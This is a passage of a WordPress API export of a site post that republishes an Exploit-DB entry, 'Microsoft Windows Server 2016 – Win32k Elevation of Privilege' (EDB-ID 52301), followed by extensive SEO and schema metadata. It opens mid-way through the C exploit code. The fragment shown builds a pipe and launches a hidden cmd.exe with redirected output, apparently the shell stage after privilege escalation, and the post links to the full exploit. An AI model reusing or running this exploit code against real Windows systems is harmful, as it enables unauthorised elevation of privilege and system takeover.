PROCESS_INFORMATION pi;<br \/>\n<br \/>    DWORD bytesRead;<br \/>\n<br \/>    RtlSecureZeroMemory(&#038;si, sizeof(si));<br \/>\n<br \/>    RtlSecureZeroMemory(&#038;pi, sizeof(pi));<br \/>\n<br \/>    RtlSecureZeroMemory(&#038;sa, sizeof(sa));<br \/>\n<br \/>    int br = 0;<br \/>\n<br \/>    sa.nLength = sizeof(SECURITY_ATTRIBUTES);<br \/>\n<br \/>    sa.lpSecurityDescriptor = NULL;<br \/>\n<br \/>    sa.bInheritHandle = TRUE;<br \/>\n<br \/>    if (!CreatePipe(&#038;hRead, &#038;hWrite, &#038;sa, 0))<br \/>\n<br \/>    {<br \/>\n<br \/>        return -3;<br \/>\n<br \/>    }<\/p>\n<p>    si.cb = sizeof(STARTUPINFO);<br \/>\n<br \/>    GetStartupInfoW(&#038;si);<br \/>\n<br \/>    si.hStdError = hWrite;<br \/>\n<br \/>    si.hStdOutput = hWrite;<br \/>\n<br \/>    si.wShowWindow = SW_HIDE;<br \/>\n<br \/>    si.lpDesktop = L&#8221;WinSta0\\\\Default&#8221;;<br \/>\n<br \/>    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;<br \/>\n<br \/>    wchar_t cmd[4096] = { L&#8221;cmd.exe&#8221; };<\/p>\n<p>    if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &#038;si,<br \/>\n<br \/>&#038;pi))<br \/>\n<br \/>    {<br \/>\n<br \/>        CloseHandle(hWrite);<br \/>\n<br \/>        CloseHandle(hRead);<br \/>\n<br \/>        printf(&#8220;[!] CreateProcessW Failed![%lx]\\n&#8221;, GetLastError());<br \/>\n<br \/>        return -2;<br \/>\n<br \/>    }<br \/>\n<br \/>    CloseHandle(hWrite);<\/p>\n<p>}\n<\/p><\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52301\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege Exploit ID EDB-ID:52301 Type exploitdb Published 2025-05-25T00:00:00 Modified 2025-05-25T00:00:00 CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,40,15,13,7,11,5],"class_list":["post-5958","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Microsoft Windows Server 2016 - Win32k Elevation of Privilege - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=5958\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows Server 2016 - Win32k Elevation of Privilege - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege Exploit ID EDB-ID:52301 Type exploitdb Published 2025-05-25T00:00:00 Modified 2025-05-25T00:00:00 CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=5958\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-25T09:34:40+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5958#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5958\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege\",\"datePublished\":\"2025-05-25T09:34:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5958\"},\"wordCount\":1173,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=5958#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5958\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5958\",\"name\":\"Microsoft Windows Server 2016 - Win32k Elevation of Privilege - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-25T09:34:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5958#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=5958\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5958#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows Server 2016 - Win32k Elevation of Privilege - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=5958","og_locale":"en_US","og_type":"article","og_title":"Microsoft Windows Server 2016 - Win32k Elevation of Privilege - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege Exploit ID EDB-ID:52301 Type exploitdb Published 2025-05-25T00:00:00 Modified 2025-05-25T00:00:00 CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=5958","og_site_name":"zero redgem","article_published_time":"2025-05-25T09:34:40+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=5958#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=5958"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege","datePublished":"2025-05-25T09:34:40+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=5958"},"wordCount":1173,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=5958#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=5958","url":"https:\/\/zero.redgem.net\/?p=5958","name":"Microsoft Windows Server 2016 - Win32k Elevation of Privilege - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-25T09:34:40+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=5958#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=5958"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=5958#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows Server 2016 &#8211; Win32k Elevation of Privilege"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/5958","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5958"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/5958\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5958"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5958"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}